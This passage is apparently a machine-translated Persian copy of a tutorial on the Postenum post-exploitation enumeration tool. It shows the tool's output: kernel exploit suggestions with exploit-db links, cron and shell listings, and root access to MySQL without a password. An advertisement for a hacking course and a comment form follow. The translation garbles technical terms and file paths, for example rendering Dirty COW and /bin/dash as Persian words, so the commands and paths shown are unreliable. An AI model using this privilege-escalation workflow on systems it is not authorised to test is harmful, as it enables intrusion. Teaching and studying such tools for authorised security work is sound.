هسته لینوکس < 4.4.0-116 (اوبونتو 16.04.4) - https://www.exploit-db.com/exploits/44298 هسته لینوکس < 4.10.15 شرایط مسابقه - https://www.exploit-db.com/exploits/43345 هسته لینوکس < 4.13.9 (اوبونتو 16.04 / فدورا 27) - https://www.exploit-db.com/exploits/45010 هسته لینوکس 2.6.22 < 3.9 کثیف گاو - https://www.exploit-db.com/exploits/40839 هسته لینوکس 2.6.22 < 3.9 کثیف گاو (x86-x64) - https://www.exploit-db.com/exploits/40616 خاص ترین سوء استفاده را برای هسته 2.6.24
------------------------------------------------------
هیچ چیز استخراج از سوء استفاده برای هسته 2.6.24 [-] نرم افزار و خدمات
[+] - بررسی شغل برنامه ریزی شده
[x] جستجو در cron در /و غیره:
drwxr-xr-x 2 root root 4096 Jul 5 سال 2018 cron.d
drwxr-xr-x 2 root root 4096 May 28 2010 cron.روزانه
drwxr-xr-x 2 root root 4096 May 16 2010 cron.ساعتی
drwxr-xr-x 2 root root 4096 May 28 2010 cron.ماهانه
drwxr-xr-x 2 root root 4096 May 16 2010 cron.هفتگی
-rw-r--r-- 1 root root 724 May 8 2008 crontab [x] List /etc/cron.d/
-rw-r--r-- 1 root root 507 May 3 2012 php5
-rw-r--r-- 1 root root 1323 Mar 31 2008 postgresql-مشترک ... [ + ] لیست تمام در دسترس پوسته
# /etc/shells: معتبر ورود پوسته
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/داش
/bin/bash
/bin/rbash
/usr/bin/صفحه نمایش [-] تلاش دسترسی
[+] - بررسی برخی از روش های برای استخراج اطلاعات کاربری و دسترسی به ریشه
[x] اتصال به MYSQL به عنوان ریشه و غیر عبور:
[/] ما می توانیم اتصال به MYSQL محلی خدمات به عنوان 'root و بدون رمز عبور!
mysqladmin نسخه 8.41 Distrib 5.0.51 a برای دبیان-linux-gnu در i486
کپی رایت (C) 2000-2006 MySQL AB
این نرم افزار همراه با کاملا بدون گارانتی. این نرم افزار رایگان,
و شما در حال خوش آمدید به تغییر و توزیع مجدد آن را تحت مجوز GPL نسخه سرور 5.0.51 a-3ubuntu5
نسخه پروتکل 10
اتصال به Localhost از طریق سوکت یونیکس
یونیکس سوکت /var/run/mysqld/mysqld.جوراب
آپ تایم: 41 دقیقه 2 ثانیه تاپیک: 2 سوال: 447 نمایش داده شد آهسته: 0 باز می شود: 420 خیط و پیت کردن جداول: 1 جدول باز: 64 نمایش داده شد در هر ثانیه avg: 0.182

آگاه باشید این یکی می تواند برخی از زمان پس از آن اجرا می شود تمام گزینه ها و جمع آوری مقدار زیادی از اطلاعات.

کاغذ بسته بندی

امروز ما آموخته است که چگونه به استفاده از Postenum یک ابزار مورد استفاده برای جمع آوری اطلاعات حیاتی در دوران پس از بهره برداری فاز. ما برای اولین بار به خطر بیافتد هدف و انتقال اسکریپت از ماشین ما. سپس ما رفت و بیش از گزینه های مختلف Postenum فراهم می کند از جمله جمع آوری شبکه و خدمات, اطلاعات, هیجان انگیز فایل های, نرم افزار, نسخه, و دیگر اطلاعات مفید است که در نهایت می تواند مورد استفاده قرار گیرد برای privilege escalation.

می خواهید شروع به ساختن پول به عنوان یک کلاه سفید هکر? پرش شروع خود را-کلاه سفید هک حرفه ای با ما 2020 حق بیمه هک اخلاقی, گواهینامه آموزشی از بسته نرم افزاری جدید Null Byte فروشگاه و دریافت بیش از 60 ساعت آموزش از هک اخلاقی حرفه ای است.

خرید در حال حاضر (96٪) >

تصویر جلد توسط ویتالی Vlasov/Pexels

tinyurlis.gdu.nuclck.ruulvis.netshrtco.de

Leave a reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>